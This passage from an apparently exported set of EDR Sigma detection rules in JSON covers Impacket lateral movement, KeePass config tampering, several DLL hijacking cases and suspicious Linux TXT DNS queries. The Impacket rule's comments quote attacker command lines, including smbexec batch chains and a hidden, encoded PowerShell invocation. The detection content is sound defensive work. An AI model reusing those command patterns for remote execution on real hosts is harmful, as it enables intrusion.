cmd.exe /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1567439113.54 2>&1\n # *** dcomexec.py -object MMC20\n # parent is mmc.exe\n # example:\n # \"C:\\Windows\\System32\\cmd.exe\" /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1567442499.05 2>&1\n # *** dcomexec.py -object ShellBrowserWindow\n # runs %SystemRoot%\\System32\\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe\n # example:\n # \"C:\\Windows\\System32\\cmd.exe\" /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1567520103.71 2>&1\n # *** smbexec.py\n # parent is services.exe\n # example:\n # C:\\Windows\\system32\\cmd.exe /Q /c echo tasklist ^> 
\\\\127.0.0.1\\C$\\__output 2^>^&1 > C:\\Windows\\TEMP\\execute.bat & C:\\Windows\\system32\\cmd.exe /Q /c C:\\Windows\\TEMP\\execute.bat & del C:\\Windows\\TEMP\\execute.bat\n # C:\\Windows\\system32\\cmd.exe /Q /c powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAdwBoAG8AYQBtAGkA 1> \\\\127.0.0.1\\ADMIN$\\__1615559515.6162736 2>&1\n ParentImage|endswith:\n - '\\wmiprvse.exe' # wmiexec\n - '\\mmc.exe' # dcomexec MMC\n - '\\explorer.exe' # dcomexec ShellBrowserWindow\n - '\\services.exe' # smbexec\n CommandLine:\n # wmiexec.py and dcomexec.py\n - '*cmd.exe* /Q /c * 1> \\\\\\\\127.0.0.1\\\\* 2>&1'\n # smbexec.py\n - '*cmd.exe* /Q /c * ^> \\\\\\\\127.0.0.1\\\\* 2^>^&1 > *'\n - '*powershell.exe* -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsA*'\n\n selection_atexec:\n ParentCommandLine|contains:\n - 'svchost.exe -k netsvcs' # atexec on win10 (parent can be \"C:\\Windows\\system32\\svchost.exe -k netsvcs\" or \"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule\")\n - 'taskeng.exe' # atexec on win7 (parent is \"taskeng.exe {AFA79333-694C-4BEE-910E-E57D9A3518F6} S-1-5-18:NT AUTHORITY\\System:Service:\")\n # cmd.exe /C tasklist /m > C:\\Windows\\Temp\\bAJrYQtL.tmp 2>&1\n CommandLine: 'cmd.exe /C *Windows\\\\Temp\\\\*&1'\n\n condition: 1 of selection_*\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "rule_name": "Impacket Lateral Movement Detected", + "rule_description": "Detects wmiexec/dcomexec/atexec/smbexec from the Impacket framework.\nImpacket is a collection of Python classes for working with network protocols.\nImpacket is focused on providing low-level programmatic access to the packets and for 
some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.\nIt is often used by threat actors to perform lateral movements.\nIt is recommended investigate the process tree for suspicious activities.\nIs is also recommended to investigate the network type authentications at the same time in order to get the IP address of the computer from which the lateral movement comes from.\n", + "rule_creation_date": "2019-09-03", + "rule_modified_date": "2026-02-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution", + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1021.002", + "attack.t1021.003", + "attack.t1047" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "10c34848-23dc-4d3c-a8e7-187197b79a2d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.621563Z", + "creation_date": "2026-03-23T11:45:34.621565Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.621569Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://blog.slowerzs.net/posts/thievingfox/", + 
"https://attack.mitre.org/techniques/T1555/005/" + ], + "name": "t1555_005_keepass_executable_config_write.yml", + "content": "title: KeePass Executable Configuration Modified by an External Tool\nid: 10c34848-23dc-4d3c-a8e7-187197b79a2d\ndescription: |\n Detects a modification of the KeePass.exe.config file that could lead to credential theft.\n Attackers may modify KeePass' configuration file which defines the behavior of the .NET runtime by switching native function pointers by malicious ones in order to dump the password database.\n It is recommended to check the file content for any added lines that could indicate a compromise.\nreferences:\n - https://blog.slowerzs.net/posts/thievingfox/\n - https://attack.mitre.org/techniques/T1555/005/\ndate: 2024/02/13\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: file_write\ndetection:\n selection:\n Path|endswith: '\\KeePass.exe.config'\n\n filter_keepass:\n ProcessOriginalFileName: 'KeePass.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Certum Code Signing 2021 CA'\n - 'Open Source Developer, Dominik Reichl'\n\n exclusion_sysytem:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - 
'?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\Program Files\\Microsoft Security Client\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_msiexec:\n ProcessImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\Syswow64\\msiexec.exe'\n\n exclusion_explorer:\n ProcessImage: '?:\\Windows\\explorer.exe'\n\n exclusion_vsssvc:\n ProcessImage: '?:\\Windows\\System32\\VSSVC.exe'\n\n exclusion_7z:\n ProcessImage|endswith:\n - '\\7z.exe'\n - '\\7zG.exe'\n - '\\7zM.exe'\n - '\\7zFM.exe'\n ProcessCompany: 'Igor Pavlov'\n ProcessDescription:\n - '7-Zip Console'\n - '7-Zip GUI'\n - '7-Zip File Manager'\n\n exclusion_winrar:\n ProcessOriginalFileName: 'WinRAR.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'win.rar GmbH'\n\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfeesp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe'\n - 'mfetp.exe'\n - 'VsTskMgr.exe'\n - 'Scan64.exe'\n - 'shstat.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n\n exclusion_dllhost:\n # Used when copy file from explorer when UAC is enabled\n ProcessImage: '?:\\Windows\\system32\\DllHost.exe'\n ProcessCommandLine: '?:\\Windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n\n exclusion_ivanti:\n ProcessParentImage: '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\sdistps1.exe'\n\n # File History Service\n exclusion_fhsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc'\n\n exclusion_robocopy:\n ProcessOriginalFileName: 'robocopy.exe'\n ProcessSigned: 'true'\n ProcessSignature: 
'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "10c34848-23dc-4d3c-a8e7-187197b79a2d", + "rule_name": "KeePass Executable Configuration Modified by an External Tool", + "rule_description": "Detects a modification of the KeePass.exe.config file that could lead to credential theft.\nAttackers may modify KeePass' configuration file which defines the behavior of the .NET runtime by switching native function pointers by malicious ones in order to dump the password database.\nIt is recommended to check the file content for any added lines that could indicate a compromise.\n", + "rule_creation_date": "2024-02-13", + "rule_modified_date": "2026-03-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1555.005" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "112484b0-ac5d-40a8-a775-0a918f1aa7f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.601524Z", + "creation_date": 
"2026-03-23T11:45:34.601528Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.601536Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://twitter.com/an0n_r0/status/1544472352657915904", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_cscript.yml", + "content": "title: DLL Hijacking via cscript.exe\nid: 112484b0-ac5d-40a8-a775-0a918f1aa7f1\ndescription: |\n Detects potential Windows DLL Hijacking via cscript.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cscript.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - 
'?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "112484b0-ac5d-40a8-a775-0a918f1aa7f1", + "rule_name": "DLL Hijacking via cscript.exe", + "rule_description": "Detects potential Windows DLL Hijacking via cscript.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1129f074-5b01-412c-9fae-a3a2a3b01770", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.087075Z", + "creation_date": "2026-03-23T11:45:34.087078Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.087084Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east", + "https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_secur32.yml", + "content": "title: Suspicious secur32.dll Loaded\nid: 1129f074-5b01-412c-9fae-a3a2a3b01770\ndescription: |\n Detects loading of a suspicious DLL named 'secur32.dll' by a process that could be a target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/05\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n 
category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\secur32.dll'\n sha256|contains: '?' # At least one character, some SHA256 are empty\n\n filter_signed_microsoft:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_commonfolders:\n ImageLoaded:\n - '?:\\Windows\\WinSxS\\\\*'\n - '?:\\Windows\\System32\\secur32.dll'\n - '?:\\Windows\\syswow64\\secur32.dll'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\secur32.dll'\n - '*\\docker\\windowsfilter\\\\*\\files\\windows\\syswow64\\secur32.dll'\n - '*\\docker\\data\\windowsfilter\\\\*\\Files\\Windows\\System32\\secur32.dll'\n - '*\\docker\\data\\windowsfilter\\\\*\\files\\windows\\syswow64\\secur32.dll'\n - '?:\\Windows\\SoftwareDistribution\\Download\\\\*\\secur32.dll'\n - '\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\windows\\system32\\secur32.dll'\n - '?:\\$WINDOWS.~BT\\NewOS\\Windows\\System32\\secur32.dll'\n\n exclusion_siemens:\n ImageLoaded:\n - '?:\\Program Files (x86)\\Siemens\\UniCam\\UniCam FX\\Secur32.dll'\n - '?:\\PROGRA~2\\Siemens\\UniCam\\UniCam FX\\Secur32.dll'\n Image|startswith: '?:\\Program Files (x86)\\Siemens\\UniCam\\UniCam FX\\'\n\n exclusion_elisath:\n Image:\n - '?:\\Elisath\\Gestion\\Gestion.exe'\n - '?:\\Elisath\\Caisse\\Caisse.exe'\n ImageLoaded:\n - '?:\\Elisath\\Gestion\\secur32.dll'\n - '?:\\Elisath\\Caisse\\secur32.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1129f074-5b01-412c-9fae-a3a2a3b01770", + "rule_name": "Suspicious secur32.dll Loaded", + "rule_description": "Detects loading of a suspicious DLL named 'secur32.dll' by a process that could be a target to DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is 
recommended to investigate the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2024-03-05", + "rule_modified_date": "2025-10-09", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1181e4c8-56a6-49c2-971f-caa5665133a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.626425Z", + "creation_date": "2026-03-23T11:45:34.626427Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.626431Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1071/004/" + ], + "name": "t1071_004_suspicious_txt_dns_linux.yml", + "content": "title: Suspicious TXT DNS Resolution (Linux)\nid: 1181e4c8-56a6-49c2-971f-caa5665133a3\ndescription: |\n Detects a suspicious TXT DNS request that could be related to an implant communication.\n Adversaries may communicate using the Domain Name 
System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\n It is recommended to analyze the process at the origin of the request for malicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1071/004/\ndate: 2024/04/02\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n product: linux\n category: dns_query\ndetection:\n selection:\n QueryType: 'TXT'\n QueryStatusCategory: 'success'\n TextRecords|contains: '?'\n ProcessImage|contains: '?'\n\n filter_mail:\n TextRecords|contains:\n - 'v=DKIM1'\n - 'v=spf1'\n - 'k=rsa'\n - 'v=DMARC1'\n - 'dkim=unknown'\n\n filter_site_verification:\n TextRecords|contains:\n - 'apple-domain-verification='\n - 'google-site-verification='\n - 'facebook-domain-verification='\n - 'adobe-idp-site-verification='\n - 'MS=ms????????'\n\n filter_know_requested_name:\n QueryName:\n - 'version.bind'\n - 'hostname.bind'\n\n filter_know_requested_name_endswith:\n QueryName|endswith:\n - '.local'\n - 'whoami.cloudflare.com'\n - 'o-o.myaddr.l.google.com'\n - '.psbl.surriel.com' # Passive spam blocklist\n - '.cbl.abuseat.org' # The Abuseat CBL (Composite Blocking List)\n - 'engine._segment._tcp.steelseries.com'\n - 'config.nos.avast.com.'\n - 'config.nos.avast.com'\n - '_nos._tcp.nos.avast.com.'\n - '_nos._tcp.nos.avast.com'\n - '.logmein-gateway.com'\n - 'current.cvd.clamav.net'\n - '.asn.rspamd.com'\n - '.asn.cymru.com'\n - 'secpoll.powerdns.com'\n - 'wgs.prod.surfshark.com'\n - 'push.apple.com'\n - '.pci.id.ucw.cz'\n - '.sophosxl.net'\n\n filter_mailer:\n - ProcessCommandLine|contains:\n - '/usr/sbin/named'\n - '/usr/local/sbin/named'\n - '/usr/sbin/amavisd'\n - '/usr/sbin/opendkim'\n - '/usr/sbin/milter-greylist'\n - '/usr/sbin/opendmarc'\n - '/usr/sbin/exim4'\n - 
'MailScanner: starting child'\n - '/usr/bin/perl -U -I /usr/share/MailScanner/perl /usr/sbin/MailScanner /etc/MailScanner/MailScanner.conf'\n - '/opt/zimbra/common/sbin/amavisd'\n - 'MailScanner: ' # MailScanner: waiting for messages\n - '/usr/bin/spamd'\n - '/usr/bin/perl -T -w /usr/bin/spamd '\n - '/usr/bin/perl /usr/bin/pmg-smtp-filter'\n - 'spamd child'\n - Image:\n - '/usr/sbin/milter-greylist'\n - '/usr/lib/postfix/sbin/smtpd'\n - '/usr/libexec/postfix/smtpd'\n - '/usr/sbin/named'\n - '/usr/local/sbin/named'\n - '/usr/sbin/opendkim'\n - '/usr/sbin/opendmarc'\n - '/usr/sbin/exim'\n - '/usr/sbin/exim4'\n - '/usr/bin/rspamd'\n\n filter_dns:\n Image:\n - '/usr/sbin/named'\n - '/lib/systemd/systemd-resolved'\n - '/usr/lib/systemd/systemd-resolved'\n - '/usr/sbin/unbound'\n - '/usr/sbin/pdns_recursor'\n - '/usr/sbin/squid'\n - '/usr/sbin/nscd'\n - '/usr/sbin/dig'\n - '/usr/bin/dig'\n - '/usr/local/nessy2/bin/named'\n\n filter_amazon_ses:\n # xxx._domainkey.yyy.com , type TXT, redirects through a CNAME to xxx.dkip.amazonses.com\n QueryName: '????????????????????????????????._domainkey.*'\n TextRecords: 'p=MI*' # contains a public key\n\n exclusion_image:\n ProcessImage:\n - '/opt/nessus/sbin/nessusd'\n - '/usr/bin/figal-client'\n - '/usr/bin/figal-sitename'\n - '*/rapid7/nexpose/nsc/.DLLCACHE/nexserv'\n - '/usr/bin/mongorestore'\n - '/usr/libexec/sssd/sssd_be'\n - '/usr/sbin/lshw'\n - '/usr/local/bin/forgejo'\n - '/usr/libexec/postfix/smtpd'\n - '/opt/puppetlabs/puppet/bin/ruby'\n - '/usr/bin/cloudflared'\n - '/usr/local/bin/cloudflared'\n\n exclusion_scan:\n # version.bind\n TextRecords: 'unbound ?.??.?'\n\n exclusion_spamcop:\n TextRecords|startswith: 'Blocked - see https://www.spamcop.net/bl.shtml?'\n\n exclusion_dkim:\n TextRecords|contains:\n - 'p=MIGf'\n - 'p= MIGf'\n - 'p=MIIBIj'\n - 'p= MIIBIj'\n QueryName|contains: '._domainkey.'\n\n exclusion_brevo:\n TextRecords|contains: 'brevo-code:??????????????????????'\n\n condition: selection and not 1 of filter_* 
and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1181e4c8-56a6-49c2-971f-caa5665133a3", + "rule_name": "Suspicious TXT DNS Resolution (Linux)", + "rule_description": "Detects a suspicious TXT DNS request that could be related to an implant communication.\nAdversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\nIt is recommended to analyze the process at the origin of the request for malicious activities.\n", + "rule_creation_date": "2024-04-02", + "rule_modified_date": "2026-01-12", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control" + ], + "rule_technique_tags": [ + "attack.t1071.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "118b000d-e5d7-48c7-a7cd-7f89310aa1b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.586261Z", + "creation_date": "2026-03-23T11:45:34.586266Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:34.586274Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_dlpumgr32.yml", + "content": "title: DLL Hijacking via dlpumgr32.exe\nid: 118b000d-e5d7-48c7-a7cd-7f89310aa1b9\ndescription: |\n Detects potential Windows DLL Hijacking via the DESlock+ User Manager executable dlpumgr32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dlpumgr32.exe'\n ProcessSignature: 'DESlock Limited'\n ImageLoaded|endswith: '\\dlpprem32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program 
Files\\ESET\\'\n - '?:\\Program Files (x86)\\ESET\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\ESET\\'\n - '?:\\Program Files (x86)\\ESET\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'DESlock Limited'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "118b000d-e5d7-48c7-a7cd-7f89310aa1b9", + "rule_name": "DLL Hijacking via dlpumgr32.exe", + "rule_description": "Detects potential Windows DLL Hijacking via the DESlock+ User Manager executable dlpumgr32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-11-04", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + 